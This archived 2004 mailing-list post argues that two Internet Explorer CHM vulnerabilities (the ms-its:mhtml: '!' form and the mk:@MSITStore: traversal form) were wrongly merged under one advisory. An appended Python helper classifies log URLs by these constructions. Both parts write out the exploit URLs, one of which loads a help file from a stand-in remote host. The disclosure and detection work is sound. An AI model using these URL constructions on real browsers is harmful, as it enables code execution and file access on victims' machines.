Message-ID: <BAY17-F37foV1qdiixj000495a4@hotmail.com>
From: lise_moorveld at hotmail.com (Lise Moorveld)
Subject: IE exploit going around on irc

Hello,

What I find interesting is that SecurityFocus links the "IE ms-its: and 
mk:@MSITStore: vulnerability" paper by Roozbeh Afrasiabi ( 
http://www.securityfocus.com/archive/1/358913 ) to the "Microsoft Internet 
Explorer Unspecified CHM File Processing Arbitrary Code Execution 
Vulnerability (bid 9658)" posting by K-otic ( 
http://www.securityfocus.com/archive/1/354447 ).
They do this in BID 9658 ( http://www.securityfocus.com/bid/9658 ).

I think SecurityFocus got this wrong...

The issue referred to by K-otic is the exploit where you use a non-existent 
mht file and an exclamation mark like so:
ms-its:mhtml:file://c:\yada.mhtml!http://www.example.com/compiledhelpfile.chm:/htmlfile.html
also described in Cert advisory VU#323070 ( 
http://www.kb.cert.org/vuls/id/323070 )
and CVE ID: CAN-2004-0380

... Roozbeh Afrasiabi doesn't use this construction anywhere in his paper... 
what he DOES use, however (amongst others), is the directory-traversal 
style thingy:
mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\winamp\\skins\\x.wsz::\winamp.htm
Now, I don't claim to fully grasp the Roozbeh paper either, but he does make 
a reference to Arman Nayyeri, and what I think is the following post: "IE 
5.x-6.0 allows executing arbitrary programs using showHelp()" ( 
http://archives.neohapsis.com/archives/bugtraq/2003-12/0337.html )
Oh, and Nayyeri claims Jelmer helped him with this, so Jelmer might be able 
to shed some light :)

To return to this thread, the original posting by Niek Baakman mentions the 
exclamation mark issue
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1726.html

And in a reply, Thor refers to the directory traversal-style issue (or at 
least the Roozbeh paper):
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1785.html

Anyway, do you guys think I'm right in thinking these are separate issues?


Bye,

Lise
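
Added example, not part of Lise's post or of any of the advisories it cites: a small log-triage helper that labels URLs by the two constructions the post distinguishes (the ms-its:mhtml: "!" form versus the mk:@MSITStore: "..\" traversal form), so a log review counts them as separate issues instead of one BID. The label names, client addresses and sample log lines are constructed for the example.

```python
import re

# Construction 1, the one Lise attributes to K-otic / CAN-2004-0380 / VU#323070:
# an ms-its: URL wrapping an mhtml: reference, with '!' separating the (missing)
# local .mht from the remote compiled help file.
MHTML_BANG = re.compile(r"^ms-its:mhtml:[^!]*!", re.IGNORECASE)

# Construction 2, the one from the Roozbeh Afrasiabi paper: mk:@MSITStore: with
# '..\' segments after the '::' separator, i.e. a path that walks out of the
# named .chm instead of naming a page inside it.
MSITSTORE_TRAVERSAL = re.compile(r"^mk:@MSITStore:.*::.*\.\.[\\/]", re.IGNORECASE)


def classify(url: str) -> str:
    """Label a URL as one of the two constructions, or 'other'."""
    if MHTML_BANG.search(url):
        return "mhtml-bang"
    if MSITSTORE_TRAVERSAL.search(url):
        return "msitstore-traversal"
    return "other"


def triage(log_lines):
    """Count each construction across log lines of the form '<client> <url>'.

    Returns a dict label -> number of matching lines, so the two issues are
    reported separately rather than lumped together under one BID.
    """
    counts = {"mhtml-bang": 0, "msitstore-traversal": 0, "other": 0}
    for line in log_lines:
        parts = line.split(maxsplit=1)
        if len(parts) != 2:
            continue  # malformed line: skip rather than guess
        counts[classify(parts[1])] += 1
    return counts


# Constructed sample log lines (hypothetical clients; the first two URLs are the
# constructions quoted in the post, the last two are benign comparison cases).
SAMPLE_LOG = [
    r"10.0.0.5 ms-its:mhtml:file://c:\yada.mhtml!http://www.example.com/compiledhelpfile.chm:/htmlfile.html",
    r"10.0.0.6 mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\winamp\\skins\\x.wsz::\winamp.htm",
    r"10.0.0.7 mk:@MSITStore:C:\WINDOWS\Help\iexplore.chm::/iegetsta.htm",
    r"10.0.0.8 http://www.example.com/index.html",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))  # {'mhtml-bang': 1, 'msitstore-traversal': 1, 'other': 2}
```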
